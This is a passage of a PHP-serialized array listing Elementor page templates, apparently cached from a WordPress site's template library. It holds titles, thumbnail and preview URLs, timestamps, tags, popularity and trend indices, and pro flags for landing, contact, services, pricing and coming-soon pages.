Hotel\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2017/03/lp2-l.png\";s:12:\"tmpl_created\";s:10:\"1490707391\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/landing-page-hotel/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"63\";s:16:\"popularity_index\";s:2:\"20\";s:11:\"trend_index\";s:2:\"19\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:62;a:14:{s:2:\"id\";s:3:\"195\";s:5:\"title\";s:28:\"Landing Page &#8211; Product\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0006.png\";s:12:\"tmpl_created\";s:10:\"1470820765\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-product/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"64\";s:16:\"popularity_index\";s:2:\"19\";s:11:\"trend_index\";s:2:\"42\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:63;a:14:{s:2:\"id\";s:3:\"197\";s:5:\"title\";s:34:\"Landing Page &#8211; Real Estate 1\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0007.png\";s:12:\"tmpl_created\";s:10:\"1470825711\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/landing-page-real-estate/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"65\";s:16:\"popularity_index\";s:2:\"35\";s:11:\"trend_index\";s:2:\"63\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:64;a:14:{s:2:\"id\";s:4:\"1193\";s:5:\"title\";s:34:\"Landing Page &#8211; Real Estate 2\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2017/03/lp3-l.png\";s:12:\"tmpl_created\";s:10:\"1490707422\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/landing-page-real-estate-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"66\";s:16:\"popularity_index\";s:2:\"28\";s:11:\"trend_index\";s:2:\"28\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:65;a:14:{s:2:\"id\";s:4:\"1415\";s:5:\"title\";s:34:\"Landing Page &#8211; Real Estate 3\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Real-Estate-1.png\";s:12:\"tmpl_created\";s:10:\"1494352106\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/landing-page-real-estate-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"67\";s:16:\"popularity_index\";s:2:\"86\";s:11:\"trend_index\";s:3:\"223\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:66;a:14:{s:2:\"id\";s:4:\"1414\";s:5:\"title\";s:34:\"Landing Page &#8211; Real Estate 4\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Real-Estate-2.png\";s:12:\"tmpl_created\";s:10:\"1494352107\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/landing-page-real-estate-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"68\";s:16:\"popularity_index\";s:3:\"127\";s:11:\"trend_index\";s:3:\"353\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:67;a:14:{s:2:\"id\";s:4:\"1413\";s:5:\"title\";s:34:\"Landing Page &#8211; Real Estate 5\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Real-Estate-3.png\";s:12:\"tmpl_created\";s:10:\"1494352109\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/landing-page-real-estate-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:134:\"[\"Agent\",\"business\",\"clean\",\"corporate\",\"flat\",\"google maps\",\"homes\",\"listing\",\"modern\",\"real estate\",\"realestate\",\"realtor\",\"realty\"]\";s:10:\"menu_order\";s:2:\"69\";s:16:\"popularity_index\";s:3:\"118\";s:11:\"trend_index\";s:3:\"316\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:68;a:14:{s:2:\"id\";s:4:\"1573\";s:5:\"title\";s:29:\"Landing Page &#8211; Coupon 1\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/Coupon-02.png\";s:12:\"tmpl_created\";s:10:\"1494352133\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/landing-page-coupon-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"70\";s:16:\"popularity_index\";s:3:\"123\";s:11:\"trend_index\";s:3:\"323\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:69;a:14:{s:2:\"id\";s:4:\"1572\";s:5:\"title\";s:29:\"Landing Page &#8211; Coupon 2\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/Coupon-03.png\";s:12:\"tmpl_created\";s:10:\"1494352134\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/landing-page-coupon-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"71\";s:16:\"popularity_index\";s:3:\"135\";s:11:\"trend_index\";s:3:\"344\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:70;a:14:{s:2:\"id\";s:4:\"1570\";s:5:\"title\";s:29:\"Landing Page &#8211; Coupon 3\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/Coupon-01.png\";s:12:\"tmpl_created\";s:10:\"1494352136\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/landing-page-coupon-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"72\";s:16:\"popularity_index\";s:3:\"153\";s:11:\"trend_index\";s:3:\"354\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:71;a:14:{s:2:\"id\";s:4:\"1571\";s:5:\"title\";s:29:\"Landing Page &#8211; Coupon 4\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/Coupon-04.png\";s:12:\"tmpl_created\";s:10:\"1494352138\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/landing-page-coupon-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"73\";s:16:\"popularity_index\";s:3:\"134\";s:11:\"trend_index\";s:3:\"356\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:72;a:14:{s:2:\"id\";s:3:\"192\";s:5:\"title\";s:28:\"Landing Page &#8211; Webinar\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0015.png\";s:12:\"tmpl_created\";s:10:\"1470820734\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-webinar/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"74\";s:16:\"popularity_index\";s:2:\"30\";s:11:\"trend_index\";s:2:\"58\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:73;a:14:{s:2:\"id\";s:4:\"2141\";s:5:\"title\";s:32:\"Contact &#8211; Delivery Company\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2017/07/delivery-contact.png\";s:12:\"tmpl_created\";s:10:\"1499774122\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/contact-delivery-company/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"75\";s:16:\"popularity_index\";s:2:\"74\";s:11:\"trend_index\";s:3:\"324\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:74;a:14:{s:2:\"id\";s:3:\"137\";s:5:\"title\";s:22:\"Contact &#8211; Modern\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0013.png\";s:12:\"tmpl_created\";s:10:\"1470829828\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/contact-modern/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"76\";s:16:\"popularity_index\";s:2:\"25\";s:11:\"trend_index\";s:2:\"40\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:75;a:14:{s:2:\"id\";s:3:\"256\";s:5:\"title\";s:26:\"Contact &#8211; Restaurant\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0011.png\";s:12:\"tmpl_created\";s:10:\"1470829796\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/contact-restaurant/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"77\";s:16:\"popularity_index\";s:2:\"36\";s:11:\"trend_index\";s:2:\"69\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:76;a:14:{s:2:\"id\";s:4:\"2150\";s:5:\"title\";s:25:\"Contact &#8211; Cake Shop\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2017/07/cake-contact.png\";s:12:\"tmpl_created\";s:10:\"1499774127\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/contact-cake-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"78\";s:16:\"popularity_index\";s:2:\"38\";s:11:\"trend_index\";s:2:\"45\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:77;a:14:{s:2:\"id\";s:3:\"223\";s:5:\"title\";s:21:\"Contact &#8211; Hotel\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0002.png\";s:12:\"tmpl_created\";s:10:\"1470820471\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/contact-hotel/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"79\";s:16:\"popularity_index\";s:2:\"37\";s:11:\"trend_index\";s:3:\"100\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:78;a:14:{s:2:\"id\";s:2:\"24\";s:5:\"title\";s:25:\"Contact &#8211; Corporate\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0012.png\";s:12:\"tmpl_created\";s:10:\"1470248619\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/contact-corporate/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"80\";s:16:\"popularity_index\";s:2:\"11\";s:11:\"trend_index\";s:2:\"10\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:79;a:14:{s:2:\"id\";s:3:\"184\";s:5:\"title\";s:23:\"Services &#8211; Moving\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0017.png\";s:12:\"tmpl_created\";s:10:\"1470829889\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/services-moving/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"81\";s:16:\"popularity_index\";s:2:\"17\";s:11:\"trend_index\";s:2:\"21\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:80;a:14:{s:2:\"id\";s:3:\"625\";s:5:\"title\";s:31:\"Services &#8211; Cake Shop Menu\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2016/12/cake-shop-menu.jpg\";s:12:\"tmpl_created\";s:10:\"1481549196\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/services-cake-shop-menu/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"82\";s:16:\"popularity_index\";s:3:\"110\";s:11:\"trend_index\";s:3:\"357\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:81;a:14:{s:2:\"id\";s:3:\"187\";s:5:\"title\";s:20:\"Services &#8211; Fun\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0001.png\";s:12:\"tmpl_created\";s:10:\"1470829892\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/services-fun/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"83\";s:16:\"popularity_index\";s:2:\"27\";s:11:\"trend_index\";s:2:\"52\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:82;a:14:{s:2:\"id\";s:3:\"238\";s:5:\"title\";s:27:\"Services &#8211; Consulting\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0014.png\";s:12:\"tmpl_created\";s:10:\"1470829865\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/services-consulting/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"84\";s:16:\"popularity_index\";s:2:\"14\";s:11:\"trend_index\";s:2:\"15\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:83;a:14:{s:2:\"id\";s:3:\"647\";s:5:\"title\";s:33:\"Services &#8211; Coffee Shop Menu\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2016/12/restaurant-menu.jpg\";s:12:\"tmpl_created\";s:10:\"1481549320\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/services-coffee-shop-menu/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"85\";s:16:\"popularity_index\";s:2:\"95\";s:11:\"trend_index\";s:3:\"363\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:84;a:14:{s:2:\"id\";s:4:\"2138\";s:5:\"title\";s:33:\"Services &#8211; Delivery Company\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/07/delivery-services.png\";s:12:\"tmpl_created\";s:10:\"1499774119\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/services-delivery-company/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"86\";s:16:\"popularity_index\";s:2:\"98\";s:11:\"trend_index\";s:3:\"288\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:85;a:14:{s:2:\"id\";s:3:\"823\";s:5:\"title\";s:19:\"Pricing &#8211; App\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2017/01/pricing-app.jpg\";s:12:\"tmpl_created\";s:10:\"1485272966\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/pricing-app-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"87\";s:16:\"popularity_index\";s:2:\"72\";s:11:\"trend_index\";s:3:\"226\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:86;a:14:{s:2:\"id\";s:3:\"824\";s:5:\"title\";s:24:\"Pricing &#8211; Software\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2017/01/pricing-software.png\";s:12:\"tmpl_created\";s:10:\"1485272900\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/pricing-software-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"88\";s:16:\"popularity_index\";s:2:\"80\";s:11:\"trend_index\";s:3:\"228\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:87;a:14:{s:2:\"id\";s:3:\"825\";s:5:\"title\";s:24:\"Product &#8211; Speakers\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2017/01/product-page.jpg\";s:12:\"tmpl_created\";s:10:\"1485272513\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/product-speakers/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"89\";s:16:\"popularity_index\";s:2:\"82\";s:11:\"trend_index\";s:3:\"328\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:88;a:14:{s:2:\"id\";s:3:\"245\";s:5:\"title\";s:21:\"Product &#8211; Clean\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0020.png\";s:12:\"tmpl_created\";s:10:\"1470829876\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/product-clean/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:48:\"[\"fast\",\"minimal\",\"minimalistic\",\"seo\",\"simple\"]\";s:10:\"menu_order\";s:2:\"90\";s:16:\"popularity_index\";s:2:\"29\";s:11:\"trend_index\";s:2:\"79\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:89;a:14:{s:2:\"id\";s:3:\"150\";s:5:\"title\";s:19:\"Product &#8211; App\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0003.png\";s:12:\"tmpl_created\";s:10:\"1470829879\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:101:\"https://library.elementor.com/product-app/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"91\";s:16:\"popularity_index\";s:2:\"16\";s:11:\"trend_index\";s:2:\"27\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:90;a:14:{s:2:\"id\";s:3:\"751\";s:5:\"title\";s:25:\"Homepage &#8211; Interior\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/01/interior-home.png\";s:12:\"tmpl_created\";s:10:\"1485269743\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/homepage-interior/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"92\";s:16:\"popularity_index\";s:2:\"60\";s:11:\"trend_index\";s:3:\"202\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:91;a:14:{s:2:\"id\";s:3:\"753\";s:5:\"title\";s:22:\"About &#8211; Interior\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/01/Interior-About.png\";s:12:\"tmpl_created\";s:10:\"1485269710\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/about-interior/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"93\";s:16:\"popularity_index\";s:2:\"78\";s:11:\"trend_index\";s:3:\"303\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:92;a:14:{s:2:\"id\";s:3:\"754\";s:5:\"title\";s:25:\"Services &#8211; Interior\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/01/Interior-Services.png\";s:12:\"tmpl_created\";s:10:\"1485269691\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/services-interior/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"94\";s:16:\"popularity_index\";s:2:\"89\";s:11:\"trend_index\";s:3:\"304\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:93;a:14:{s:2:\"id\";s:3:\"752\";s:5:\"title\";s:24:\"Contact &#8211; Interior\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2017/01/interior-contact.png\";s:12:\"tmpl_created\";s:10:\"1485269737\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/contact-interior/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"95\";s:16:\"popularity_index\";s:2:\"77\";s:11:\"trend_index\";s:3:\"318\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:94;a:14:{s:2:\"id\";s:4:\"1075\";s:5:\"title\";s:19:\"Shop &#8211; Sweets\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2017/03/Sweets.png\";s:12:\"tmpl_created\";s:10:\"1488810871\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:101:\"https://library.elementor.com/shop-sweets/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:154:\"[\"bakery\",\"beverage\",\"business\",\"cafe\",\"candy bar\",\"catering\",\"delivery service\",\"Food\",\"online shop\",\"pastry\",\"Restaurant\",\"store\",\"sweet shop\",\"sweets\"]\";s:10:\"menu_order\";s:2:\"96\";s:16:\"popularity_index\";s:2:\"31\";s:11:\"trend_index\";s:2:\"41\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:95;a:14:{s:2:\"id\";s:4:\"1051\";s:5:\"title\";s:24:\"Blog Post &#8211; Launch\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2017/03/post-cloud.png\";s:12:\"tmpl_created\";s:10:\"1488810869\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blog-post-launch/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:210:\"[\"Agency\",\"bootstrap\",\"business\",\"corporate\",\"Landing Page\",\"launch\",\"marketing campaign\",\"marketing landing page\",\"marketing template landing page\",\"product launch\",\"software\",\"Startup\",\"startup landing page\"]\";s:10:\"menu_order\";s:2:\"97\";s:16:\"popularity_index\";s:2:\"23\";s:11:\"trend_index\";s:2:\"18\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:96;a:14:{s:2:\"id\";s:4:\"1245\";s:5:\"title\";s:13:\"Coming Soon 1\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-1.png\";s:12:\"tmpl_created\";s:10:\"1491207184\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"98\";s:16:\"popularity_index\";s:2:\"68\";s:11:\"trend_index\";s:3:\"212\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:97;a:14:{s:2:\"id\";s:4:\"1247\";s:5:\"title\";s:13:\"Coming Soon 2\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-2.png\";s:12:\"tmpl_created\";s:10:\"1491207138\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"99\";s:16:\"popularity_index\";s:2:\"26\";s:11:\"trend_index\";s:2:\"25\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:98;a:14:{s:2:\"id\";s:4:\"1248\";s:5:\"title\";s:13:\"Coming Soon 